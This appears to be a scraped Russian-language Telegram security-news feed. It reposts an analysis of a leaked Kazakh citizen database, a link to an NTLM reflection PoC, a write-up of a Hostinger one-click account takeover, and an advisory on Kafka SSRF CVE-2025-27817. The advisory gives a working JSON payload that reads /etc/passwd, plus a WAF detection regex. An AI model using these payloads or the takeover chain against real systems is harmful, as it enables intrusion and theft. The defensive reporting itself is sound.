Forwarded from SecuriXy.kz
Проанализировали архив утечки: «Жители Казахстана 2024»
📁 Обнаружен CSV-файл с персональными данными казахстанцев, содержащий 16,3 млн строк. В таблице присутствуют следующие поля:
Фамилия, Имя, Отчество, Пол, Дата рождения, Идентификатор, ИИН, Мобильный, Рабочий, Домашний, Гражданство, Национальность, Адрес, Адрес подтвержден, Дата начала и конца проживания.
📊 Результаты анализа
📦 Общее количество записей: 16 302 107
🔐 Уникальных ИИН: 15 851 699
📱 Уникальных номеров телефонов: 16 901 555
📦 Описание архива
Размер архива: 799 МБ (сжатый .zip)
SHA256-сумма: bbfc54507c502b612e5e89aa601d8930a92732924c0db11f314e398113ccf014
Файл внутри архива: CSV-файл размером 7.03 ГБ
Дата упаковки: 2024-06-13 23:06:48 (+0500)
🧭 Предварительные выводы
В графе “адрес” часто встречаются адреса стоматологий, поликлиник, Налогового комитета, университетов и других организаций.
Это может указывать на:
массовый сбор данных через публичные/полуоткрытые API;
взломы poorly configured сервисов, возвращающих ФИО/ИНН/телефон по ID;
или ошибочные дампы из интеграционных систем.
🚨 Вывод
Утечка содержит чувствительные персональные данные, включая ИИН и контактные номера.
Она представляет риск: для фишинга, социальной инженерии, подделки документов, телефонного мошенничества.
Будьте внимательны. При возникновении подозрений на утечку собственных данных - проверьте активности в eGov, мобильных банках, налоговой и пр.
📁 Обнаружен CSV-файл с персональными данными казахстанцев, содержащий 16,3 млн строк. В таблице присутствуют следующие поля:
Фамилия, Имя, Отчество, Пол, Дата рождения, Идентификатор, ИИН, Мобильный, Рабочий, Домашний, Гражданство, Национальность, Адрес, Адрес подтвержден, Дата начала и конца проживания.
📊 Результаты анализа
📦 Общее количество записей: 16 302 107
🔐 Уникальных ИИН: 15 851 699
📱 Уникальных номеров телефонов: 16 901 555
📦 Описание архива
Размер архива: 799 МБ (сжатый .zip)
SHA256-сумма: bbfc54507c502b612e5e89aa601d8930a92732924c0db11f314e398113ccf014
Файл внутри архива: CSV-файл размером 7.03 ГБ
Дата упаковки: 2024-06-13 23:06:48 (+0500)
🧭 Предварительные выводы
В графе “адрес” часто встречаются адреса стоматологий, поликлиник, Налогового комитета, университетов и других организаций.
Это может указывать на:
массовый сбор данных через публичные/полуоткрытые API;
взломы poorly configured сервисов, возвращающих ФИО/ИНН/телефон по ID;
или ошибочные дампы из интеграционных систем.
🚨 Вывод
Утечка содержит чувствительные персональные данные, включая ИИН и контактные номера.
Она представляет риск: для фишинга, социальной инженерии, подделки документов, телефонного мошенничества.
Будьте внимательны. При возникновении подозрений на утечку собственных данных - проверьте активности в eGov, мобильных банках, налоговой и пр.
Forwarded from Похек
How-Anthropic-teams-use-Claude-Code_v2.pdf
5.9 MB
How Anthropic teams use Claude Code
#Anthropic #Claude #vibecoding #coding #dev #ai #ии
PDFка от Anthropic, где они делятся своим опытом использования Claude Code для разработки, безопасности, API и т.д. Это не читшит/гайд с промптами или как правильно, а как не правильно. В каждой теме команда приводит пример последотельности мыслей/действий и топ советов, как использовать Claude Code под конкретную задачу
Оглавление:
Claude Code for data infrastructure
Claude Code for product development
Claude Code for security engineering
Claude Code for inference
Claude Code for data science and visualization
Claude Code for API
Claude Code for growth marketing
Claude Code for product design
Claude Code for RL engineering
Claude Code for legal
🔗 pdf прикреплена к посту
🌚 @poxek | 🌚 Блог | 📺 YT | 📺 RT | 📺 VK
#Anthropic #Claude #vibecoding #coding #dev #ai #ии
PDFка от Anthropic, где они делятся своим опытом использования Claude Code для разработки, безопасности, API и т.д. Это не читшит/гайд с промптами или как правильно, а как не правильно. В каждой теме команда приводит пример последотельности мыслей/действий и топ советов, как использовать Claude Code под конкретную задачу
Оглавление:
Claude Code for data infrastructure
Claude Code for product development
Claude Code for security engineering
Claude Code for inference
Claude Code for data science and visualization
Claude Code for API
Claude Code for growth marketing
Claude Code for product design
Claude Code for RL engineering
Claude Code for legal
Please open Telegram to view this post
VIEW IN TELEGRAM
Fsecurity | HH
🔗Ссылка: https://www.kali.org/blog/kali-linux-2025-2-release/
www.opennet.ru
Выпуск дистрибутива для исследователей безопасности Kali Linux 2025.2
Представлен релиз дистрибутива Kali Linux 2025.2, основанного на пакетной базе Debian и предназначенного для тестирования систем на наличие уязвимостей, проведения аудита безопасности, анализа остаточной информации и выявления последствий атак. Все оригинальные…
🔗Ссылка:
https://opennet.ru/63411/
https://opennet.ru/63411/
Forwarded from Волосатый бублик
PoC Exploit for the NTLM reflection SMB flaw.
https://github.com/mverschu/CVE-2025-33073
На ваш страх и риск
https://github.com/mverschu/CVE-2025-33073
На ваш страх и риск
Хабр
Дыра в щите Cloudflare: как атака на Jabber.ru вскрыла проблему, о которой молчат c 2023
Когда думаешь, что под надёжной защитой, но дьявол, как всегда, в деталях Думаю, многие помнят позапрошлогодний инцидент с Man-in-the-Middle атакой на XMPP-сервис jabber.ru . Эта история наделала...
🔗 Ссылка:
https://habr.com/ru/articles/918570/
https://habr.com/ru/articles/918570/
www.opennet.ru
Arch Linux перешёл на 64-разрядные сборки Wine (WoW64)
Разработчики дистрибутива Arch Linux объявили о сборке по умолчанию Wine и Wine-Staging в режиме Wow64 (64-bit Windows-on-Windows), обеспечивающем выполнение 32-разрядных Windows-приложений в 64-разрядных Unix-системах. Поставка 64-разрядных сборок Wine позволила…
🔗Ссылка:
https://opennet.ru/63418/
https://opennet.ru/63418/
Forwarded from Репорты простым языком
💥 Захват аккаунта Hostinger в один клик: разбор красивой цепочки уязвимостей
Сегодня разберем элегантный кейс от ресерчера aziz0x48, который привел к 1-Click Account Takeover. Идеальный пример того, как одна маленькая брешь в доверии рушит всю защиту.
⛓️ Все началось с классического Open Redirect на домене аутентификации
⚙️ На поддомене
– Жертва переходит по ссылке атакующего.
–
– На уязвимой странице срабатывает XSS, который простым fetch отправляет весь
– Профит! Токен в руках, его можно обменять на полноценный JWT и получить полный доступ к аккаунту.
🗣 Особенно интересна коммуникация с командой безопасности. Изначально они пытались понизить критичность, ссылаясь на то, что
В итоге команда Hostinger согласилась и исправила уязвимость.
🎓 Главный вывод: Доверие должно быть подкреплено проверкой. Наличие поддомена в вайтлисте не делает его автоматически безопасным. Любая доверенная сущность — это часть вашей поверхности атаки.
🔗 Полный разбор кейса читайте на нашем сайте:
eh.su/reports/124
Сегодня разберем элегантный кейс от ресерчера aziz0x48, который привел к 1-Click Account Takeover. Идеальный пример того, как одна маленькая брешь в доверии рушит всю защиту.
⛓️ Все началось с классического Open Redirect на домене аутентификации
auth.hostinger.com. Как мы знаем, сам по себе он часто имеет низкий импакт. Но здесь была одна важная деталь: в белом списке разрешенных доменов для редиректа находился поддомен marketing.hostinger.com. Именно он и стал слабым звеном.⚙️ На поддомене
marketing.hostinger.com обнаружилась Reflected XSS через параметр redirect_url. В итоге получилась убийственная цепочка:– Жертва переходит по ссылке атакующего.
–
auth.hostinger.com видит, что пользователь залогинен, добавляет в URL временный auth-token и редиректит его на "доверенный" marketing.hostinger.com.– На уязвимой странице срабатывает XSS, который простым fetch отправляет весь
window.location (вместе с токеном) на сервер злоумышленника.– Профит! Токен в руках, его можно обменять на полноценный JWT и получить полный доступ к аккаунту.
🗣 Особенно интересна коммуникация с командой безопасности. Изначально они пытались понизить критичность, ссылаясь на то, что
marketing.hostinger.com — стороннее приложение вне скоупа. Ресерчер грамотно парировал: Если ваш основной сервис доверяет поддомену и перенаправляет на него чувствительные данные, то с точки зрения безопасности это ваша проблема.
В итоге команда Hostinger согласилась и исправила уязвимость.
🎓 Главный вывод: Доверие должно быть подкреплено проверкой. Наличие поддомена в вайтлисте не делает его автоматически безопасным. Любая доверенная сущность — это часть вашей поверхности атаки.
🔗 Полный разбор кейса читайте на нашем сайте:
eh.su/reports/124
www.opennet.ru
Релиз среды рабочего стола KDE Plasma 6.4
После четырёх месяцев разработки опубликован релиз среды рабочего стола KDE Plasma 6.4. Для оценки работы новых выпусков KDE можно воспользоваться сборками от проектов KDE Neon и openSUSE (Argon, основанный на openSUSE Leap, и Krypton, основанный на openSUSE…
🔗Ссылка:
https://opennet.ru/63421/
https://opennet.ru/63421/
Forwarded from 1N73LL1G3NC3
BloodHound Query Library
A collection of Cypher queries designed to help BloodHound users to unlock the full potential of the BloodHound platform by creating an open query ecosystem.
Blog: https://specterops.io/blog/2025/06/17/introducing-the-bloodhound-query-library/
A collection of Cypher queries designed to help BloodHound users to unlock the full potential of the BloodHound platform by creating an open query ecosystem.
Blog: https://specterops.io/blog/2025/06/17/introducing-the-bloodhound-query-library/
👍1🔥1
Forwarded from Threat Hunting Father 🦔
Hunting Through APIs 🐱
In today’s blog, we’re diving into the world of hunting through APIs. In the blog, the advantages, limitations, and scopes of the Graph API, Azure Monitor API, and Defender ATP API are discussed. For all of these solutions, a ready-to-use PowerShell script is shared.
These APIs can enhance security operations, automate threat detection, and enable bigger automation potential. In this blog the following topics are discussed:
- Available Data
- Permissions
- API Limitations
- Hunting Through PowerShell
- Hunting the Hunters
The next blog explains how these APIs can be used in Logic Apps, so stay tuned for the next one!
🔗 https://kqlquery.com/posts/hunting-api-kql/
🦔 THF
In today’s blog, we’re diving into the world of hunting through APIs. In the blog, the advantages, limitations, and scopes of the Graph API, Azure Monitor API, and Defender ATP API are discussed. For all of these solutions, a ready-to-use PowerShell script is shared.
These APIs can enhance security operations, automate threat detection, and enable bigger automation potential. In this blog the following topics are discussed:
- Available Data
- Permissions
- API Limitations
- Hunting Through PowerShell
- Hunting the Hunters
The next blog explains how these APIs can be used in Logic Apps, so stay tuned for the next one!
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Четыре луча
SSRF в Apache Kafka Client CVE-2025-27817
CVE-2025-27817 обнаружена в Apache Kafka Client и затрагивает механизм аутентификации SASL/OAUTHBEARER. Эта уязвимость позволяет злоумышленнику указать произвольные значения параметров sasl.oauthbearer.token.endpoint.url и sasl.oauthbearer.jwks.endpoint.url, что может привести к реализации SSRF.
❗️Уязвимы версии 3.1.0 – 3.9.0 — рекомендуем обновиться.
Метрики
Описание уязвимости
Kafka Client позволяет указать URL-адреса в конфигурации:
sasl.oauthbearer.token.endpoint.url —это параметр конфигурации в Apache Kafka Client, который указывает URL-адрес сервера аутентификации OAuthBearer, откуда клиент должен получить токен доступа.
sasl.oauthbearer.jwks.endpoint.url —это параметр конфигурации Apache Kafka Client, который указывает URL для получения JWKS (JSON Web Key Set) — набора ключей, используемых для проверки подписанных OAuth токенов.
Проблема
Kafka не ограничивает допустимые схемы URL — можно подставить:
Пример эксплойта
В данном запросе злоумышленник получит содержимое файла /etc/passwd через схему file. А в известном эксплоите обращение идет к эндроинту
Как защищаться
На WAF можно написать правило, которое контролировало содержимое ключей
Например подобным регулярным выражением
Возможные исключения: в схемах https, http отсутствие адресов, недоступных для внешних пользователей.
CVE-2025-27817 обнаружена в Apache Kafka Client и затрагивает механизм аутентификации SASL/OAUTHBEARER. Эта уязвимость позволяет злоумышленнику указать произвольные значения параметров sasl.oauthbearer.token.endpoint.url и sasl.oauthbearer.jwks.endpoint.url, что может привести к реализации SSRF.
❗️Уязвимы версии 3.1.0 – 3.9.0 — рекомендуем обновиться.
Метрики
Base core: 7,5 (High)
CWE: CWE 918
Описание уязвимости
Kafka Client позволяет указать URL-адреса в конфигурации:
sasl.oauthbearer.token.endpoint.urlsasl.oauthbearer.jwks.endpoint.urlsasl.oauthbearer.token.endpoint.url —
sasl.oauthbearer.jwks.endpoint.url —
Проблема
Kafka не ограничивает допустимые схемы URL — можно подставить:
file:// → приведёт к чтению локального файла и логированию его содержимого.http:// или https:// → позволяет сделать запрос к произвольному серверу, в том числе во внутренней сети → SSRF.Пример эксплойта
{
"type": "kafka",
"spec": {
"type": "kafka",
"ioConfig": {
"type": "kafka",
"consumerProperties": {
"bootstrap.servers": "127.0.0.1:1337",
"sasl.mechanism": "OAUTHBEARER",
"security.protocol": "SASL_SSL",
"sasl.login.callback.handler.class": "org.apache.kafka.common.security.oauthbearer.secured.OAuthBearerLoginCallbackHandler",
"sasl.oauthbearer.token.endpoint.url": "file:///etc/passwd",
"sasl.jaas.config": "org.apache.kafka.common.security.oauthbearer.OAuthBearerLoginModule required;"
},
"topic": "xx",
"useEarliestOffset": true
},
"dataSchema": {
"dataSource": "test"
}
}
}В данном запросе злоумышленник получит содержимое файла /etc/passwd через схему file. А в известном эксплоите обращение идет к эндроинту
/druid/indexer/v1/samplerКак защищаться
На WAF можно написать правило, которое контролировало содержимое ключей
sasl.oauthbearer.token.endpoint.url и sasl.oauthbearer.jwks.endpoint.url, что бы в них не передавались схемы http, ftp, php, https, file, data. Например подобным регулярным выражением
\"\s*sasl\.oauthbearer\.(token|jwks)\.endpoint\.url\s*\":\s*\"\s*(http:\/\/|https:\/\/|file:\/\/|php|data|ftp).*?\"
Возможные исключения: в схемах https, http отсутствие адресов, недоступных для внешних пользователей.
❤1